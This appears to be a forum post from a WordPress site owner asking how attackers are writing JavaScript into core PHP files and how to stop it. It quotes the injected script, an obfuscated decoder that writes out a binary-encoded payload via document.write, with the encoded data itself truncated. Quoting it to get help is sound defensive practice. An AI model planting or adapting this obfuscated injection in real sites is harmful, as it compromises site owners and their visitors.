I have a blog created with wordpress, now i have a problem. Attackers writes javascript codes into my files.
Let’s assume i have holes in my plugin scripts, but how can they write into php files?
here is part of the list of php files, in which they write the script
(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...
and this is the javascript they write into
<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>
How can i prevent such attacks?
I haven’t any experience with wordpress, so any help will be very nice.
Thanks much